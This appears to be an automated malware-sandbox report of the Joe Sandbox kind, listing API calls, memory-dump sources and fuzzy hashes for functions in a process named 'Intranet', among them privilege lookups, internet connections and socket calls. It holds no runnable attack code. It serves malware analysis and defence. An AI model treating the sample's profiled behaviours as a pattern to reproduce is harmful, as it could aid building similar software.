                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                            • String ID:
                                                                            • API String ID: 521402451-0
                                                                            • Opcode ID: 02c59ee0feca94ecad405b54ebefa1071124fc0d1c5334d30247ce7296c9dd7c
                                                                            • Instruction ID: 727977084bd2633de194457b021f8d594c7e2957077fd09c5b19ff99c0d771ab
                                                                            • Opcode Fuzzy Hash: 02c59ee0feca94ecad405b54ebefa1071124fc0d1c5334d30247ce7296c9dd7c
                                                                            • Instruction Fuzzy Hash: 7A11327A904208AACB08B7B6AC52EFE7B28EF81324F10011FF204572C2DF691C5653A9
                                                                            APIs
                                                                              • Part of subcall function 004F8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004F8D3F
                                                                              • Part of subcall function 004F8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D49
                                                                              • Part of subcall function 004F8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D58
                                                                              • Part of subcall function 004F8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D5F
                                                                              • Part of subcall function 004F8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D75
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004F92C1
                                                                            • _memcmp.LIBCMT ref: 004F92E4
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F931A
                                                                            • HeapFree.KERNEL32(00000000), ref: 004F9321
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 1592001646-0
                                                                            • Opcode ID: d0ade9b58bcfdc3606e17662596bac178d6e8e55f8181e0dcba7cd55dd629861
                                                                            • Instruction ID: 5ee052e73a51a30f8811bec9f39b554a0b5541edbd47c71d24e8bc1baefe83c6
                                                                            • Opcode Fuzzy Hash: d0ade9b58bcfdc3606e17662596bac178d6e8e55f8181e0dcba7cd55dd629861
                                                                            • Instruction Fuzzy Hash: 49217A31E40208AFDB10DFA4C945BFEB7B8EF55305F05409AE984AB290D774AE48DB94
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00511E6F
                                                                              • Part of subcall function 00511EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00511F18
                                                                              • Part of subcall function 00511EF9: InternetCloseHandle.WININET(00000000,0000002A,DEADBEEF,00000000), ref: 00511FB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 1463438336-0
                                                                            • Opcode ID: 38fb1829ee388d4c47cc2c8fcb4dc70af169f819bf8fabec37d389ee1dec73c9
                                                                            • Instruction ID: 3b68cd5aa7f7158ebf687d4ec92d29a8de711c49fbe426f84ac0f33b0d6c92c3
                                                                            • Opcode Fuzzy Hash: 38fb1829ee388d4c47cc2c8fcb4dc70af169f819bf8fabec37d389ee1dec73c9
                                                                            • Instruction Fuzzy Hash: 71218335204B06BFEB119FA08C05FBBBFADFB84700F104619FE4596650DB71A861AB94
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,00532C4C), ref: 00503F57
                                                                            • GetLastError.KERNEL32 ref: 00503F66
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00503F75
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00532C4C), ref: 00503FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: 4b494fea3c8b475592b9ff30cf79ffc5d3f48af2ad994c96d570dc53eef30988
                                                                            • Instruction ID: d5724a500628ea63e91cabca01b78eab82b65092d0b25428c28f5be4d46441d3
                                                                            • Opcode Fuzzy Hash: 4b494fea3c8b475592b9ff30cf79ffc5d3f48af2ad994c96d570dc53eef30988
                                                                            • Instruction Fuzzy Hash: CF216D709082029FC710DF29C8958AFBBF8BF59368F104A1EF495C72E1D7359A4ACB52
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC,00000001), ref: 005263BD
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005263D7
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005263E5
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005263F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 29a7b5285129bc9be1b00f048cf00f59efe4a012a5ddf104364f85874bd306ce
                                                                            • Instruction ID: df943d3f70e245751619094c78e44c53df2dd1335cf103f0437defb36ce4200d
                                                                            • Opcode Fuzzy Hash: 29a7b5285129bc9be1b00f048cf00f59efe4a012a5ddf104364f85874bd306ce
                                                                            • Instruction Fuzzy Hash: 5411B131305524AFDB04AB25EC55FBA7B99FFA6320F14451DF916CB2D2CBA4AD008B94
                                                                            APIs
                                                                              • Part of subcall function 004FF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004FE46F,?,?,?,004FF262,00000000,000000EF,00000119,?,?), ref: 004FF867
                                                                              • Part of subcall function 004FF858: lstrcpyW.KERNEL32(00000000,?,?,004FE46F,?,?,?,004FF262,00000000,000000EF,00000119,?,?,00000000), ref: 004FF88D
                                                                              • Part of subcall function 004FF858: lstrcmpiW.KERNEL32(00000000,?,004FE46F,?,?,?,004FF262,00000000,000000EF,00000119,?,?), ref: 004FF8BE
                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004FF262,00000000,000000EF,00000119,?,?,00000000), ref: 004FE488
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,004FF262,00000000,000000EF,00000119,?,?,00000000), ref: 004FE4AE
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,004FF262,00000000,000000EF,00000119,?,?,00000000), ref: 004FE4E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: 9d026754554718a85aa103c27267de0aaf688d74b462e60034c041f6f9060da9
                                                                            • Instruction ID: 6e8ae6ed71b59a161676419de4ae15cc3deb7253ed88f7d278b04375f48907bb
                                                                            • Opcode Fuzzy Hash: 9d026754554718a85aa103c27267de0aaf688d74b462e60034c041f6f9060da9
                                                                            • Instruction Fuzzy Hash: FD11EE3A200349AFCB20AF65DC05D7A77A8FF45350B40402FFA06CB2A0EB74A840C799
                                                                            APIs
                                                                            • _free.LIBCMT ref: 004D5331
                                                                              • Part of subcall function 004C593C: __FF_MSGBANNER.LIBCMT ref: 004C5953
                                                                              • Part of subcall function 004C593C: __NMSG_WRITE.LIBCMT ref: 004C595A
                                                                              • Part of subcall function 004C593C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000004,?,?,004C1003,?), ref: 004C597F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AllocHeap_free
                                                                            • String ID:
                                                                            • API String ID: 1080816511-0
                                                                            • Opcode ID: f10b576fb9595b2f2d2ef6d47192bd9d9f35b6726b3d14cf94b50f28f90dec9c
                                                                            • Instruction ID: a2311b41bfa2ee4cfd1e89f3172ca1a22a8ef168ca63e348333619811c62535c
                                                                            • Opcode Fuzzy Hash: f10b576fb9595b2f2d2ef6d47192bd9d9f35b6726b3d14cf94b50f28f90dec9c
                                                                            • Instruction Fuzzy Hash: AF11E732505B15AFCB642F75AC25B5F3B949F203E4F10492FFC499A3A0DEBC89409798
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004B5B58
                                                                              • Part of subcall function 004B56F8: _memset.LIBCMT ref: 004B5787
                                                                              • Part of subcall function 004B56F8: _wcscpy.LIBCMT ref: 004B57DB
                                                                              • Part of subcall function 004B56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?,00000080), ref: 004B57EB
                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 004B5BAD
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B5BBC
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?), ref: 004F0D7C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1378193009-0
                                                                            • Opcode ID: de27a884ee238524d9f295a0271a2764176270e64ea7555fecbfb9a192329d6f
                                                                            • Instruction ID: 54db2e0a34e3c4e3e27937dfded9487a16b4bf54dd81c0011e2e567e9edbff9c
                                                                            • Opcode Fuzzy Hash: de27a884ee238524d9f295a0271a2764176270e64ea7555fecbfb9a192329d6f
                                                                            • Instruction Fuzzy Hash: 7921DA705087889FE7728B648895BFBFBEC9F51308F04048EE79A56282C7782989DB55
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00504385
                                                                            • _memset.LIBCMT ref: 005043A6
                                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005043F8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00504401
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                            • String ID:
                                                                            • API String ID: 1157408455-0
                                                                            • Opcode ID: f471b8f4f26499aa622ac5a5ad539b3ee70137a57500ae3c722bebf6acdc73cc
                                                                            • Instruction ID: 408211fdb1261b82e102fac36a4b652259f6a2300c88857738231b2efeea3c21
                                                                            • Opcode Fuzzy Hash: f471b8f4f26499aa622ac5a5ad539b3ee70137a57500ae3c722bebf6acdc73cc
                                                                            • Instruction Fuzzy Hash: D211B2B59012287AD7209AA5AC4DFEFBB7CEB44720F00459AF908A72D0D2744E808AA4
                                                                            APIs
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00507E51,?,?,00000000), ref: 004B4041
                                                                              • Part of subcall function 004B402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00507E51,?,?,00000000,?,?), ref: 004B4065
                                                                            • #52.WSOCK32(?,?,?), ref: 00516A84
                                                                            • #111.WSOCK32(00000000), ref: 00516A8F
                                                                            • _memmove.LIBCMT ref: 00516ABC
                                                                            • #11.WSOCK32(?), ref: 00516AC7
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$#111_memmove
                                                                            • String ID:
                                                                            • API String ID: 70051993-0
                                                                            • Opcode ID: 9f0ea5f8c7f85bbf378580f1b7d8ab0f3104b2da6e330c8b4cb102122c4f8eb6
                                                                            • Instruction ID: dd3915dbca4e080ed4a05ae015c8bbb4fdd09b1b18c9826e32de4fe5f8988249
                                                                            • Opcode Fuzzy Hash: 9f0ea5f8c7f85bbf378580f1b7d8ab0f3104b2da6e330c8b4cb102122c4f8eb6
                                                                            • Instruction Fuzzy Hash: BC118172500109EFCB04FBA5CD56DEEBBB8BF54304B00406AF502A72A2DF34AE04DBA1
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 004A16B4
                                                                            • GetClientRect.USER32(?,?,?,?,?), ref: 004DB93C
                                                                            • GetCursorPos.USER32(?), ref: 004DB946
                                                                            • ScreenToClient.USER32(?,?), ref: 004DB951
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 4127811313-0
                                                                            • Opcode ID: 28e10738e8cd81367ba72907591cbe3bfc2e4fde36445f93c17cc465af3e1dd3
                                                                            • Instruction ID: c7cc7b69f69f8de85b876bd0d473ead4537f057ca1d56bb8d100d79324040b5a
                                                                            • Opcode Fuzzy Hash: 28e10738e8cd81367ba72907591cbe3bfc2e4fde36445f93c17cc465af3e1dd3
                                                                            • Instruction Fuzzy Hash: 88112875A00119ABCB00EF98D899DBE77B8FB26301F140456F941E7260C734BA55DBA9
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004F9719
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000,?,000000B0,?,?), ref: 004F972B
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 004F9741
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 004F975C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: e0cd8dbf27dd231de88d7db23f83b0467dab3e993f6d50d24b76ba7a1e4cf93a
                                                                            • Instruction ID: b445bd075319e5d29afba9b797a4e4e98988fbbc0fe2d0fbbd6206447e458021
                                                                            • Opcode Fuzzy Hash: e0cd8dbf27dd231de88d7db23f83b0467dab3e993f6d50d24b76ba7a1e4cf93a
                                                                            • Instruction Fuzzy Hash: 67114839900218FFEB11EF95C985FAEBBB8FB48710F204096EA00B7290D6716E11DB94
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,004A2004), ref: 004A214F
                                                                            • GetStockObject.GDI32(00000011,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096,?), ref: 004A2163
                                                                            • SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096), ref: 004A216D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: 60581bf6b8343071d249da525d40391d35bd9bd0e347a2e41bace5e340f0e7f6
                                                                            • Instruction ID: c11bedc233947c1788a7af7355b2ce4a1a48b912b950adeaab684f3bd44348ff
                                                                            • Opcode Fuzzy Hash: 60581bf6b8343071d249da525d40391d35bd9bd0e347a2e41bace5e340f0e7f6
                                                                            • Instruction Fuzzy Hash: C011CBB2101208BFDB024F988C50EEB7B68EF69354F000102FA0452250C7759C60FFA0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005004EC,?,0050153F,?,00008000), ref: 0050195E
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,005004EC,?,0050153F,?,00008000), ref: 00501983
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005004EC,?,0050153F,?,00008000), ref: 0050198D
                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,005004EC,?,0050153F,?,00008000), ref: 005019C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: cc9b64b9124ba0381161e5d763e0b14ab1bd970da0664cb0dde75e137b2eb44f
                                                                            • Instruction ID: 3e236a4ec666e0e036116992efab0cdabc669ec5c186d160665b89845104f6d0
                                                                            • Opcode Fuzzy Hash: cc9b64b9124ba0381161e5d763e0b14ab1bd970da0664cb0dde75e137b2eb44f
                                                                            • Instruction Fuzzy Hash: 64113031D04A1DDBCF009FA5D998BEDBF78FF18751F014955E940B2280CB309554DB9A
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0052E1EA
                                                                            • #183.OLEAUT32(?,00000002,0000000C), ref: 0052E201
                                                                            • #163.OLEAUT32(0000000C,?,00000000), ref: 0052E216
                                                                            • #442.OLEAUT32(0000000C,?,00000000), ref: 0052E234
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #163#183#442FileModuleName
